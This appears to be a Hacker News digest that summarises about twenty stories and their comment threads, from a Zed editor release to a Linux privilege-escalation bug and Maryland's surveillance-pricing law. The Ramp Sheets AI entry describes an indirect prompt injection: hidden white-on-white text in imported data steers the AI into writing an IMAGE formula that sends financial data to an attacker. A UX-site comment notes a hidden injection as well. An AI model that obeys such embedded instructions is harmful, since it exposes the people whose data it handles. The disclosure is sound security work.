Table of Contents

Hacker News

Zed, the GPU-accelerated code editor built in Rust by the creators of Atom, has reached version 1.0 after five years of development. Rather than building on Electron or web technology, Zed created its own UI framework (GPUI) that renders via GPU shaders, enabling exceptional performance across Mac, Windows, and Linux. The 1.0 release covers multi-language support, Git integration, SSH remoting, debugging, and over a million lines of code. Zed is AI-native from the ground up, supporting parallel agents, keystroke-level edit predictions, and the Agent Client Protocol (ACP), integrating external agents including Claude, Codex, OpenCode, and Cursor. The team is also launching Zed for Business with centralized billing and role-based access controls. Looking ahead, DeltaDB — a CRDT-based synchronization engine — is in development to enable character-level collaborative editing between humans and AI agents, a capability the team argues is impossible without owning the full stack.

Comments: User reception is broadly positive on speed, with many migrating from JetBrains, VS Code, and Sublime Text, though notable concerns temper enthusiasm. A prominent issue is the license agreement granting Zed broad rights to process customer data including source code. Technical complaints include search results opening in new tabs instead of a sidebar, confusing multi-agent/worktree UX around branch ownership, non-Latin keyboard shortcut failures on Linux, and extensibility requiring Rust even for language servers. Missing features noted include screen reader support, Python notebook support, PDF preview, and call hierarchy. Some users report LSP extensions silently failing on first run, and persistent longstanding bugs despite 1.0 — with critics arguing AI features were prioritized over stability. The GPUI framework draws admiration as a potential standalone Rust UI library. Praise centers on startup speed, low memory usage, vim mode quality, and strong out-of-the-box defaults, with many calling it the first editor to displace Emacs or Sublime for daily use.

CVE-2026-31431, "Copy Fail," is a Linux local privilege escalation found by AI tool Xint Code in roughly one hour. Unlike typical LPEs requiring race conditions or kernel-specific offsets, this straight-line logic flaw in authencesn AEAD handling chains through AF_ALG sockets and splice() into a 4-byte page-cache write, requiring only an unprivileged local user. A 732-byte Python 3.10+ script works unmodified across all mainstream Linux distributions with kernels built between 2017 and the patch, confirmed on Ubuntu 24.04, Amazon Linux 2023, RHEL 10.x, and SUSE 16. The attack surface spans shared dev boxes, CI runners, container hosts, and any multi-user kernel environment. Mitigation includes disabling algif_aead via modprobe, blocking AF_ALG via seccomp, or applying mainline kernel commit a664bf3d603d, which reverts the 2017 in-place algif_aead optimization. The PoC is published for defenders to verify systems; the same scan surfaced additional high-severity bugs still under coordinated disclosure.

Comments: Users widely confirm instant root shells on unpatched systems including recently updated Ubuntu 24.04. The page references "RHEL 14.3," which doesn't exist (current RHEL is 10.x), widely attributed to AI-generated content. Red Hat and Debian have labeled the issue "moderate severity" with fixes deferred, which users find inconsistent with its impact. On RHEL 9/10, algif_aead is compiled into the kernel, making the modprobe mitigation ineffective; systemd service drop-ins are suggested as an alternative. The exploit doesn't escape rootless Podman containers or work unmodified on Alpine Linux, which lacks world-readable setuid binaries; a working Alpine variant requiring /bin/ping has been shared. Users advise against running the obfuscated PoC directly and offer a readable Python one-liner to safely check module availability. Discussion covers Android exposure, the systemic problem of world-readable SUID binaries enabling LPEs, and the significance of an AI tool uncovering a nine-year-old critical kernel bug in roughly one hour.

A GitHub issue revealed that Claude Code (v2.1.119) routes API requests to "extra usage" billing instead of the included Max plan quota when "HERMES.md" appears in recent git commit messages. The bug affected a Max 20x plan subscriber ($200/month) who consumed only 13% of weekly capacity but was charged $200.98 in extra usage. The trigger is specifically the string in commit history — not a file on disk — and is case-sensitive: lowercase "hermes.md," "HERMES" alone, and "HERMES.txt" don't trigger it. Claude Code includes recent commits in its system prompt, and something server-side routes differently when HERMES.md is detected. The user identified the cause through systematic binary search, testing orphan branches and isolating individual commit strings. Initial Anthropic support denied compensation for technical errors — later confirmed to have been an AI-generated response. Thariq from the Claude Code team announced full refunds plus bonus credits equal to each affected user's monthly subscription. Anthropic attributed the root cause to "an overactive anti-abuse system" that has since been fixed.

Comments: An Anthropic employee confirmed the initial "no compensation" response was generated by Claude, not a human, and a Claude Code team member publicly announced full refunds plus bonus credits for all affected users. Many commenters share similar billing experiences — double and triple charges — mostly resolved only through credit card chargebacks after Anthropic support failed to help. Some speculate the HERMES.md detection was an anti-competitive mechanism targeting Nous Research's open-source Hermes AI agent, though Anthropic attributed it to an overactive anti-abuse system. Critics highlight the irony of an AI company using AI bots to deflect billing complaints, with users describing those interactions as useless and brand-damaging. Broader frustration covers perceived model quality decline, difficult onboarding, and unresponsive customer service. Several users announced switching to OpenAI Codex, citing billing unpredictability. Calls for legislation mandating human-accessible billing support appeared frequently, and a minority urged calm, noting the refund came within days of the bug surfacing publicly.

Rheinmetall, Germany's largest defense firm, has dramatically scaled up ammunition and military equipment production, with CEO Armin Papperger claiming Germany now surpasses the United States in conventional ammunition production capacity. Artillery shell output grew from 70,000 to 1.1 million per year, medium-caliber ammunition from 800,000 to 4 million, and military trucks from 600 to 4,500 annually. The company received 350,000 job applications in 2025 alone, currently employs 44,000 people (targeting 70,000 by 2030), and works with 11,500 German suppliers—4,500 of which also serve the automotive sector. Papperger suggests arms production could replace roughly a third of jobs lost in Germany's declining automotive industry. This expansion aligns with Germany's first-ever official military strategy naming Russia the primary threat to European security, with Berlin aiming to build Europe's most powerful conventional army.

Comments: Commenters question the production comparisons, pointing out that North Korea's estimated output of 2 million 152mm artillery shells per year appears to exceed Germany's 1.1 million, undermining the "largest producer" claim and highlighting the need for contextual clarity around calibers, stockpiles, and whether rates are monthly or annual. The US figure of roughly 672,000 shells annually does confirm Germany's lead over America. Several observers invoke Germany's militaristic history with pointed skepticism. A prominent critique argues Germany is investing in legacy artillery while modern warfare has shifted toward drones—China has reportedly procured 1 million kamikaze strike drones and the US is pursuing $55 billion in drone investment—though some note this ammunition ramp-up was likely funded in 2023–2024 before drone dominance became strategically undeniable, and that future procurement decisions would likely look quite different.

FastCGI, 30 years old, solves two critical HTTP security problems in reverse proxy-to-backend communication. HTTP/1.1's ambiguous message framing enables desync/request-smuggling attacks where proxy and backend disagree on message boundaries — a recurring vulnerability despite patching efforts. FastCGI uses explicit framing; HTTP/2 also fixes this but has far less proxy support (nginx only added HTTP/2 backend support in late 2025, Apache's remains experimental). HTTP also lacks structural separation between trusted proxy-injected headers and untrusted client headers, allowing spoofing of X-Real-IP or True-Client-IP. FastCGI solves this by prefixing client HTTP headers with "HTTP_", with REMOTE_ADDR automatically populating Go's http.Request. Major proxies (nginx, Apache, Caddy, HAProxy) support FastCGI, and Go's stdlib makes switching as simple as replacing http.Serve with fcgi.Serve. Downsides include no WebSocket support, inferior tooling (curl cannot make FastCGI requests), and unoptimized throughput on some workloads. The author has run FastCGI in production for over 10 years and advocates adoption despite its vintage status.

Comments: Commenters surface alternatives: one contributor describes Web Application Socket (WAS), designed 16 years ago, using a control socket plus two pipes enabling splice() and request cancellation, with open-source implementations including a PHP SAPI and web server. Others reflect on the HTTP vs. FastCGI/SCGI wars, arguing HTTP won by embodying the End-to-End Principle — flexible multi-layer proxies without a new protocol — though at cost of Principle of Least Privilege security. Several flag uWSGI as overlooked. One commenter pushes back that HTTP/2 fixes framing equally well while preserving browser testability, questioning FastCGI's tradeoffs. Others share nostalgia for Perl+FastCGI setups and note FastCGI's process orchestration role (auto-scaling, crash recovery). WebSocket limitations are acknowledged; WHATWG streams over long-lived HTTP are suggested as a workaround with backpressure benefits. WebTransport is mentioned but deemed not a true replacement. A few report negative experiences with FastCGI on Windows/Apache stacks, while one describes using plain CGI for agent-generated custom pages leveraging Go's stdlib support on both sides.

Neal Agarwal has launched a new multiplayer cursor-based interactive playground on neal.fun, where visitors from around the world share a whimsical virtual space and interact in real time through their cursors. The world features activities including beach volleyball, soccer, a pool with a diving board, a stage for impromptu dance parties, a cave with a flashlight effect, a waterfall, a DJ booth, and a beach yurt serving mushroom soup. Players can earn nine badges — Cannonball!, Treasure Hunter, Goal!, S'more Please, Cat Person, Take a Seat, Slide!, Beachcomber, and Green Thumb — by discovering hidden interactions. Technical highlights include use of Rive for animation, country-based player detection that differs from standard GeoIP, and mobile support, though some devices heat up under sustained use. One friction point noted is that re-implementing mouse movement introduces sensitivity problems on trackpads.

Comments: Commenters describe spontaneous joyful moments — beach volleyball games, soccer matches, and dance parties with strangers worldwide — and draw strong comparisons to Club Penguin. A ROT13-encoded badge guide circulated in the thread helps players find hidden activities without spoiling discoveries. Technically minded users confirm the project uses Rive for animations, observe that country detection doesn't rely on standard GeoIP, and note mobile compatibility works but causes iPhone heat buildup. One user flags that re-implementing mouse movement creates frustrating cursor sensitivity issues on trackpads, and another requests better two-finger tap support for right-click menus. Several commenters suggest adding small custom avatars to make social interactions feel more personal than plain cursor icons. The experience draws nostalgia for early internet culture, Living Books CD-ROMs, and Homestar Runner Easter eggs, with many expressing it proves the internet can still foster genuine human connection.

Gooseworks, a 3-person startup from the founders of Athina AI (used by Perplexity, Doximity, and others), is hiring a Founding Growth Engineer to build and operate AI-powered growth engines for customers using their "Goose" platform. The role splits roughly 50/50 between running real GTM work for customers (outbound, SEO/AEO, Reddit, influencer marketing, content) and R&D to convert those one-off engagements into templatized, self-serve playbooks that Goose agents run autonomously. Goose is described as an OpenClaw-style AI coworker with its own filesystem, memory, email, accounts, and integrations, reachable via Slack, Telegram, or email like any human coworker. Their thesis is that GTM/growth work is undergoing the same transformation coding did three years ago, with orchestration and workspace context being the bottleneck rather than model capability. The target customer is founders, GTM engineers, and growth operators at fast-growing startups who want 10x execution speed. The ideal candidate has measurable, compounding growth results from prior startups or agency work—viral launches and Product Hunt wins explicitly don't meet the bar.

Comments: Nothing to summarize!

Haskell earns praise for its powerful type system, algebraic data types, monads, and popularizing mathematical concepts in programming, but proves frustrating for rapid prototyping due to monadic abstraction overhead, strict pure/impure separation, and complex dependency management. The author describes spending hours wrestling with Haskell's XML libraries where a JVM solution would take minutes, ultimately abandoning the prototype entirely. Scheme (specifically GNU Guile) is preferred for its interactive REPL via SWANK-style integration—enabling live debugging, incremental development, and function redefinition without restart—and its flexible macro system that allows metaprogramming with far less ceremony than Haskell's Template Haskell. Haskell's DSL-heavy Hackage ecosystem (Parsec, Servant, etc.) imposes steep, inconsistent learning curves across libraries, while Lisp's s-expressions provide a unified data representation model. The author frames Haskell as a "platonic ideal" illuminating functional programming theory but too rigid for most practical work, while acknowledging Scheme's weaker enterprise ecosystem versus JVM alternatives.

Comments: Commenters broadly support pragmatism over purity while adding nuance. Several advocate Racket as a more accessible Lisp with a large standard library, noting most Racket developers never need to write macros since the standard library already provides them, and that s-expressions offer a superior alternative to XML and JSON for data representation. Clojure is suggested as a JVM-based bridge between Lisp flexibility and enterprise ecosystem. One lengthy critique argues Haskell's real barrier is its confusing "word salad" syntax—user-invented infix operators, overloaded literals, bizarre indentation rules—rather than monads, contrasting SML and Erlang as cleaner alternatives; SWANK is cited as Lisp's true killer feature for live-program interactive editing, a workflow lost in batch-oriented mainstream languages. A mild plagiarism concern is raised over similarity to a 2012 HN post with the same thesis. Others mention Chicken Scheme, S9 Scheme, and Forth as practical alternatives, and Coalton is suggested as a Haskell-like language that runs on Lisp.

A webpage attempts to illustrate Monero's core privacy feature by presenting a specific Monero wallet address and noting that any attempt to view its balance is futile — Monero's protocol by design hides transaction amounts and balances from outside observers, unlike transparent blockchains such as Bitcoin. The address shown (47xmhb...S7Fyv2) is not random; it belongs to The Rage, an independent journalism outlet, and is used for public donations. The page's tone is sardonic, framing the privacy block as Monero "saying no" to snooping, effectively serving as both a demonstration and a soft advertisement for Monero's anonymity guarantees.

Comments: Commenters are largely dismissive of the page itself, calling it clickbait, and at least one notes the site appeared to be down at time of access. The most substantive comment identifies the Monero address as the donation wallet for The Rage, a journalism outlet one commenter describes as doing quality work, pointing to their official donations page at therage.co/donate. No technical debate about Monero's privacy model emerges in the comments.

The content catalogs roughly 30 foundational UX and cognitive psychology principles as brief one-sentence definitions, covering interaction design (Fitts's Law, Hick's Law, Doherty Threshold <400ms), visual perception via Gestalt principles (proximity, similarity, closure, common region, uniform connectedness), and memory constraints (Miller's 7±2 items, serial position effect, working memory, Zeigarnik Effect). Behavioral patterns include the Pareto 80/20 rule, Parkinson's Law, goal-gradient effect, and peak-end rule. Other entries cover Jakob's Law, Tesler's Law of Conservation of Complexity, Von Restorff isolation effect, Occam's Razor, Postel's Law, aesthetic-usability effect, cognitive bias, cognitive load, mental models, flow state, chunking, selective attention, and poka-yoke (users skip manuals). The collection is formatted as a poster-style visual reference aimed at designers and developers seeking a consolidated checklist of established UX principles.

Comments: Commenters are split: some appreciate the poster format and note many laws trace to Nielsen Norman Group research, while others criticize entries like "Cognitive Bias" as bare dictionary definitions rather than actionable rules, suggesting the collection was assembled to sell posters. A practical use case has users feeding these laws into AI tools like ChatGPT and Claude for automated UX review, with shared before/after dashboard redesigns showing real improvements. The Doherty Threshold (<400ms) sparks debate about preferring smaller, faster AI models for programming to sustain real-time engagement, with one commenter redefining "best model" as the smallest, cheapest one that reliably completes the job. Community-proposed additions include UI stability, avoiding meaningless icons, and restoring default scrollbars. One user found a prompt injection hidden in the site's HTML instructing AI to generate a sea shanty. Irony is noted in the UX laws site itself lacking a two-pane scroll layout, and a commenter observes engineers are culturally discouraged from expressing the user frustration that defines bad UX.

A vulnerability in Ramp's Sheets AI allowed indirect prompt injections hidden in externally sourced datasets to manipulate the AI into inserting malicious formulas that silently exfiltrate financial data with no user approval. The attack embeds white-on-white hidden text in an imported dataset, instructing the AI to collect sensitive data and build an IMAGE formula pointing to an attacker URL with the victim's financials appended as query parameters—which fires automatically. PromptArmor disclosed the issue to Ramp on February 19, 2026, but received no response until March 14 after two follow-ups; Ramp attributed the delay to a transition between disclosure programs and confirmed a fix on March 16. A nearly identical flaw was previously found in Claude for Excel; Anthropic remediated it with a red warning interstitial displaying full formulas before insertion. Ramp's specific fix was not publicly detailed.

Comments: Commenters draw a pointed irony: decades of work preventing computers from executing data as instructions are being undone by AI agents designed to do exactly that. Several note the stakes are especially high for fintech—Ramp handles corporate spend data, making financial exfiltration far more serious than leaking a to-do list. Critics flag that PromptArmor had to follow up three times over nearly a month before getting a response, and one commenter notes a likely typo (May vs. March for the resolution date). On the technical side, users observe that the modern tooling ecosystem—npm, pip, cargo—is already built on high-trust, in-band-only signaling, so LLMs inheriting that model is unsurprising; the open question is what Ramp's specific mitigation was versus Anthropic's warning dialog. A dissenting view argues the behavior is expected for any app ingesting untrusted data and questions whether the responsible-disclosure framing is warranted. One commenter says they'll avoid companies using AI internally, viewing it as a marker of desperation.

This open-source project provides freely available plans for a 3D-printed stethoscope validated in a peer-reviewed PLOS ONE study to perform comparably to the Littmann Cardiology III gold standard, with total material cost targeting ~$1-4 USD. Printed components — head, ear tubes, Y-piece, spring, and ring — must be produced in PETG or ABS at mandatory 100% infill with 0.2mm layer height, as any lower infill directly degrades acoustic output. Hardware includes silicone tubing in two diameters (8mm ID/13mm OD and 4mm ID/8mm OD, both 50 durometer), a 40mm diaphragm cut from a ~0.35mm plastic report cover, and standard large earbuds. PLA is explicitly discouraged due to heat deformation and early spring failure. Source files are generated via CrystalSCAD and OpenSCAD, and the project is released under the TAPR Open Hardware License. Assembly involves attaching the diaphragm to the head, routing silicone tubing through the Y-piece, and connecting spring-mounted ear tubes to standard earbuds.

Comments: Commenters question the peer-reviewed results, noting that no acoustic engineering or modeling was performed and that 3D-printed circular tube cross-sections produce internal surface roughness — causing attenuation — and that a "ô"-shaped profile would print more cleanly. Comparable metal stethoscopes are available for $1.22/unit in bulk from Alibaba or ~$7 retail, undercutting the project's cost argument for well-supplied regions. Sterilization is raised as a serious concern: 3D-printed materials contain microscopic pores that caused hospitals to reject printed PPE during COVID-19, and a stethoscope contacts both patients and providers. Single-use plastic stethoscopes already exist for under $2 in bulk. An interview with researcher Tarek Loubani (linked in comments) provides the true motivation: delivering functional medical tools in resource-limited or conflict-affected areas such as Gaza. Users express surprise that brand-name stethoscopes cost $100+ while Littmanns are noted to last 20+ years, and questions are raised about passive vs. active device classification and sterilization protocols.

Postgres lateral joins let subqueries reference preceding FROM clause columns, producing the same query plan as a standard INNER JOIN. This enables composable query DSLs, unlike ORMs (which hide joins but cause painful M2M update bugs) or plain SQL generators (which lack composability). Inspired by Haskell's Rel8, the author built a Rust equivalent where each closure line adds a CROSS JOIN LATERAL and where_ adds a WHERE clause. Expr<'scope, T> uses Rust's borrow checker to prevent expressions escaping their valid scope. User tables use a TableMode GAT that switches field types between &str, raw values, and Expr, with MapTable enabling field traversal without combinatorial trait impls. The library supports aggregations via .aggregate(), left-outer joins via .optional(), and row collection via .many(). Compile-time guarantees ensure only valid SQL is generated. Sea-query serves as the underlying AST builder.

Comments: Users note they independently discovered the lateral join approach when building their own composable query layers, finding it superior to CTEs — which require the query layer to distinguish CTE clauses from regular clauses, resulting in worse ergonomics. The comment confirms lateral joins as a natural, practical fit for composable join abstractions beyond just the theoretical elegance described.

Elsevier removed John Goodell, Editor-in-Chief of RIBAF, in a citation cartel crackdown that already ousted Brian Lucey and Samuel Vigne from five other journals. Goodell's output surged from single digits pre-2021 to 53-58 papers annually, propelled by 125 papers gifted across three journals he co-controlled, pushing his citations to 15,663—with 4,203 earned in 2025 alone, producing the J-curve signature of citation rings. The scheme was an industrial quid pro quo: junior scholars submitted to RIBAF, added Goodell as co-author at other journals, and their submissions were accepted. A network analysis placed Goodell as the most influential researcher among 500 top finance professors in the Elsevier ecosystem. One Edinburgh Napier professor published 22 RIBAF papers in 2024-2025, adding Goodell to 14 papers at other journals, and appears to have scrubbed and quietly restored those publications from Google Scholar. Elsevier's guidelines require editorial recusal for co-author submissions—rules Goodell violated hundreds of times. An estimated 200-350+ RIBAF papers are retraction candidates, but Elsevier appears to be containing the scandal rather than confronting it.

Comments: Commenters broadly view the scandal as symptomatic of academia's overreliance on vanity metrics like H-index and publication counts rather than research quality, calling for tenure committees and funding bodies to reform how scholars are evaluated. Several note Goodell's exponential citation growth was conspicuous enough to invite scrutiny and question whether he genuinely believed the scheme would go unnoticed. Deep frustration with Elsevier and publishers like Springer-Verlag recurs throughout, with some arguing these publishers should be removed from the academic ecosystem entirely, and others feeling less guilty about years of using piracy sites like Libgen. There is curiosity about whether AI language models retain indexed versions of papers researchers tried to scrub from Google Scholar. Some note Elsevier has a documented history of rewarding prolific editors with expanded roles rather than disciplining them. Several observe that three firings barely dents a problem likely involving thousands of participants across the ecosystem. One commenter questions the informal, pithy tone of the piece despite not disputing its factual claims.

Kyoto's cherry blossom peak bloom dates have been recorded since 812 AD, forming what is regarded as the longest continuous record of any natural phenomenon on Earth. Compiled by Yasuyuki Aono from imperial diaries, monastery records, and modern meteorological data — archived at NOAA Paleoclimatology — the dataset reveals a clear climate signal over more than a millennium. For most of that span, peak bloom fell in early-to-mid April, with the Little Ice Age visible as a drift toward later peaks between the 14th and 19th centuries. Beginning around 1900, the 30-year rolling mean fell sharply, dropping below any value recorded during the Heian period. The 2026 peak arrived March 29 — over two weeks earlier than the pre-modern average. Though local to one species in one city, its extraordinary length makes it a uniquely credible climate proxy. The piece also notes that centuries of observation gave Japanese a precise seasonal vocabulary — words like 満開 (mankaii, full bloom) and 花吹雪 (hanafubuki, blossom blizzard) — and uses this to promote JIVX, an AI-graded Japanese language app.

Comments: Commenters largely corroborate the trend with personal observations — earlier blooms on home trees, blossoming periods shortened from a week to three days — while a Midwest user notes a colder-than-average spring as a regional counterpoint. Several call the 1,200-year human-curated dataset itself remarkable and ask whether comparable long-term records exist for other phenomena. The climate framing draws both agreement and pushback: some use sarcasm to mock denial, while others argue humans struggle to reason across long timescales, fueling misplaced skepticism. A few raise complicating factors — urban heat islands in Kyoto, selective breeding of cultivars for earlier bloom, and changes in horticultural practice since 1900 — as alternative explanations. One commenter identifies the piece as a reformatted Our World in Data visualization. Concern about ecological consequences also surfaces, with users questioning impacts on pollinators and tree health over coming years. The comment quality is noted by at least one participant as disappointing overall.

Tangled is a federated Git collaboration platform built on AT Protocol, positioning itself as a GitHub alternative amid recent reliability concerns. Code servers called "knots" use standard git for transfer while AT Protocol handles issues, pull requests, follows, stars, and collaborator invites. Developers can push to their own server and open pull requests against repos on entirely different servers. Social features integrate with the broader Bluesky ecosystem. Active users praise the Spindles CI/CD system, static site hosting, native Jujutsu VCS support, and an open API built on shared AT Protocol standards. Tangled has received seed funding including from Bain Capital Crypto, raising enshittification concerns typical of VC-backed platforms. Critics debate whether AT Protocol is preferable to ActivityPub, modernized email-based workflows like git format-patch, or simply configuring multiple git remotes. Alternatives include ForgeFed, Forgejo's federation roadmap, Nostr-based gitworkshop.dev, and Radicle. Some argue what is truly needed is an implementation-agnostic SDLC API standard rather than another federated transport protocol.

Comments: Commenters raise the "cold start" problem: joining a large server recreates GitHub's centralization, while self-hosting yields zero network and discoverability. Comparisons to Mastodon's federation struggles are frequent, with predictions of defederation politics, spam challenges, and fragmentation. VC backing—including Bain Capital Crypto—draws enshittification skepticism, while AT Protocol draws criticism from those preferring ActivityPub, IndieAuth/OAuth, or pure git-based solutions; one user cites post-quantum cryptography exposure as a technical concern. Alternative approaches suggested include modernized git format-patch workflows, Fossil's embedded issue tracker, GitSocial's git-as-federation-layer, gitworkshop.dev on Nostr, and Radicle. One year-long active user praises Spindles CI/CD, Jujutsu-first support, static site hosting, and Bluesky social graph integration. Others argue forge federation is unnecessary since git remotes are already distributed and OAuth handles single-login. Some users prefer a transport-agnostic SDLC schema standard over yet another protocol, while others question why AT Protocol was chosen over the mature git-over-email workflow.

The Dutch government has launched code.overheid.nl, a self-hosted open-source code platform built on Forgejo, an open-source European alternative to GitHub and GitLab that prioritizes digital sovereignty. The pilot is initiated by the Open Source Program Office at the Ministry of Interior (BZK), in collaboration with DAWO, Opensourcewerken, and developer.overheid.nl, with participation not yet open to all government bodies. A notable early project is "regelrecht," which encodes Dutch legal texts as structured YAML and executes them as deterministic decision logic with full explanation trails. Germany operates a comparable platform at opencode.de (built on GitLab) with hardened container images, while the UK government has catalogued over 17,000 open-source projects. The platform launched to significant public interest, experiencing an HN-driven traffic spike, but issues noted include dark mode readability failures, i18n inconsistencies, residual GitHub references in repos, and a choice to deploy pre-release Forgejo v16 over stable v15.

Comments: Dutch developers expressed enthusiasm, with several noting years of internal advocacy for government open-source adoption that went unanswered. Users highlighted "regelrecht" — encoding legal texts as YAML decision trees — sparking curiosity about use cases and how frequent policy amendments would be managed. Germany's opencode.de and the UK's 17,000+ government OSS projects were cited as precedents; GitLab's Dutch origins were noted with amusement. Technical critiques included dark mode accessibility failures (dark purple text on dark backgrounds), i18n issues (English default with Dutch content), pre-release Forgejo v16 over stable v15, and residual GitHub links needing cleanup. Broader aspirations for digital sovereignty across operating systems and cloud infrastructure were raised, alongside concerns about replacing one oligarchy with a European equivalent. Interest in cross-jurisdictional coordination to avoid duplicated OSS efforts was also discussed. One comment quipped: "most governments are still in the meeting — the Dutch shipped it and went home for dinner."

Operation PowerOFF is an international law enforcement effort led largely by the Dutch Police targeting DDoS-for-hire services. A researcher found two honeypot sites: cyberzap.fun, a covert fake booter with a realistic dashboard collecting user IPs and emails as evidence, and netcrashers.net, an overt scare-tactic site redirecting visitors to a police warning page. The covert site used bit.nl hosting — a Dutch police telltale — and had only 14 prior "attack" orders, suggesting limited reach. After registering with an obvious research email, the researcher found cyberzap.fun locked with a 401 shortly after probing, along with an unused associated domain. The operation also released an AI-generated video dramatizing a police raid on a teenager for DDoS attacks, dismissed as propaganda. The broader goal appears to be creating suspicion around booter services to deter users beyond just making arrests. Operation PowerOFF used similar infiltration tactics before, documented by the UK's NCA in 2023. Cyberzap.fun was registered April 3, 2025 but was empty when archived in July 2025, raising questions about its actual launch.

Comments: Commenters largely challenge the author's framing. On the claim that the site shutdown was caused by his probing, skeptics argue a WAF rule blocking his IP is far more plausible than law enforcement "panicking," calling out the author for excessive self-credit. Critics also push back on the notion that creating suspicion in the DDoS-for-hire community is harmful — pointing out that this "community" is mainly kids wanting to knock game servers offline, making police disruption a good outcome. The author's assertion that the honeypots have "no real impact" is questioned, given that Operation PowerOFF has shut down dozens of booter sites and may have deterred or warned off numerous potential customers. One commenter notes the site technically qualifies as a genuine honeypot by definition. The thread draws an ironic parallel between the author's criticism of law enforcement self-promotion and his own self-congratulatory post, suggesting both share the same impulse.

A post by @GlennMeder on X (inaccessible without JavaScript) argues mandatory online age verification is a trojan horse for mass surveillance, warning that identity infrastructure will ultimately require all users to prove who they are before accessing websites or apps. The post claims children will lose the ability to explore or speak freely online without permanent logging. This is debated against accelerating legislation: the UK's Online Safety Act is in effect, Australia has social media age limits with influencer loopholes, and Greece has reportedly moved to ban online anonymity entirely. Technical alternatives cited include zero-knowledge proofs, fully homomorphic encryption, anonymous credential systems, RTA content headers, and Estonia's hardware-key identity model. Critics argue parental responsibility — not surveillance infrastructure — should govern children's internet access, while supporters contend age verification for social media and pornography reasonably extends existing regulations around gambling and alcohol.

Comments: Commenters are broadly skeptical of mandatory age verification, framing it as identity verification in disguise. Technical alternatives are widely cited — zero-knowledge proofs, fully homomorphic encryption, RTA content-labeling headers, Estonia's cryptographic hardware-key model — but governments show no interest in privacy-preserving options. UK users report feeling politically powerless after the Online Safety Act passed; Greece banning online anonymity is cited as the logical endpoint. Many warn mandatory ID verification will normalize large-scale identity fraud as privacy-seeking adults circumvent systems. Others push back: some argue age-gating pornography or social media differs little from gambling or alcohol rules, and First Amendment constraints limit slippery-slope fears. Parental responsibility is a strong counter-theme. The EFF's resource page is mentioned as an action item. One commenter proposes a "Cashier Standard" — offline-style age checks without digital infrastructure. Others note a sudden, coordinated international push for these laws with no clear public origin, and that YC funds companies building the very verification systems being debated.

The blaster beam is a large electric instrument — a 12–18-foot metal beam strung with tensed wires and fitted with movable guitar pickups — that produces a distinctive dark, bass tone when plucked or struck with fingers, sticks, or pipes. Designed by John Lazelle in the early 1970s and first widely used by Francisco Lupica, it gained widespread fame through Craig Huxley's refined aluminum version, most notably in Jerry Goldsmith's score for Star Trek: The Motion Picture (1979) as the signature V'ger sound, and earlier that year on a Wonder Woman episode. Huxley patented his design in 1984 and co-wrote David Shire's 2010 (1984) score, while James Horner used it in Battle Beyond the Stars (1980) and Star Trek II: The Wrath of Khan (1982). It also appeared in The Black Hole, Dreamscape, Meteor, and Star Wars: Episode II for the seismic charge sound, and in Bear McCreary's 10 Cloverfield Lane (2016). A notable curiosity arose in the early 1990s when women at a Central Park concert claimed arousal from the sound, prompting an Australian radio experiment that yielded no similar results from listeners.

Comments: The sole comment expresses genuine skepticism about whether the blaster beam actually exists, noting that the instrument's official website shows only bare metal beams with no strings or pickups visible, and that the Wikipedia article's photo is too small and blurry to be convincing. The commenter questions whether the whole thing might be a late April Fools joke, reflecting a broader challenge the instrument faces in public recognition despite its documented use across decades of well-known film scores.

Vera is a programming language designed for LLMs to write, compiling to WebAssembly and running in browser or CLI. Rather than variable names, it uses typed structural references (@Int.0, @Int.1) to eliminate naming errors models commonly make. Every function requires mandatory contracts — preconditions, postconditions, and effect declarations — verified by Z3 SMT solver, making division by zero a compile-time type error. Effects are fully typed: a function using HTTP or LLM inference must declare those in its signature, and callers lacking those permissions cannot invoke it. Three-tier verification covers decidable arithmetic statically, guided cases, and runtime fallback. The compiler emits LLM-oriented diagnostics with stable error codes, JSON output, and fix instructions with code examples. VeraBench results show Kimi K2.5 achieves 100% run_correct on Vera versus Python's 86% and TypeScript's 91%, with three models beating TypeScript. The reference compiler is at v0.0.127 with 3,638 tests and 96% code coverage; the roadmap targets a verified MCP tool server where contracts guarantee tool schemas at compile time.

Comments: Commenters praise Vera's effect type system as especially well-suited for LLM-generated code, noting it enables capability proofs before runtime — you can verify agent code cannot perform IO, or sandbox it with mock network or filesystem access if it must, providing a safer foundation for meta-systems where agents create other agents. One commenter requests more technical depth on how division by zero becomes a compile-time type error. The most pointed skepticism targets the elimination of variable names: commenters question whether structural references actually improve LLM code generation or simply introduce obfuscation, noting the claim feels unsupported by empirical evidence — challenging one of Vera's central design premises.

Maryland became the first US state to ban grocery surveillance pricing, signed Tuesday by Governor Wes Moore. Surveillance pricing uses personal data — location, search history, demographics — to charge buyers the maximum they'll pay. The FTC under Biden documented the practice broadly, but the current administration is unlikely to act; Colorado, California, Massachusetts, Illinois, and New Jersey are considering similar laws. Critics say Maryland's law is undermined by exemptions for loyalty programs and promotional offers — letting retailers raise baseline prices then offer personalized discounts, achieving the same discriminatory outcome the law aims to prohibit. Enforcement falls to the attorney general only; individuals cannot sue, and penalties are capped at $10,000 for a first offense and $25,000 for subsequent violations. Consumer Reports called enforcement "weak" and urged lawmakers to revisit the legislation. Instacart, previously exposed by Consumer Reports, says it already stopped the practice. Advocates warn other states may replicate Maryland's law, calling it an "industry-written permission slip."

Comments: Commenters question how surveillance pricing would function in physical grocery stores, where shelf prices are publicly visible and must match checkout prices. Many note loyalty programs and coupon clipping have long enabled differential pricing — exempting them arguably guts the law's intent. Critics point out fines of $10,000–$25,000 are laughably small for retailers large enough to deploy such systems. Several highlight the core loophole: a retailer can raise prices for everyone then offer personalized discounts, arriving at the same discriminatory outcome the law purports to ban. The absence of a private right of action — only the AG can enforce — is widely seen as a fundamental accountability failure. Users debate whether the law is worse than nothing, since other states may adopt it as a template despite its weaknesses. Some suggest simpler strategies, like shopping at stores without loyalty programs, offer more practical protection. Broader concerns were raised that increasingly adversarial dynamic pricing could make household budgeting nearly impossible for lower-income shoppers, and that buyers may eventually need AI agents just to compete.

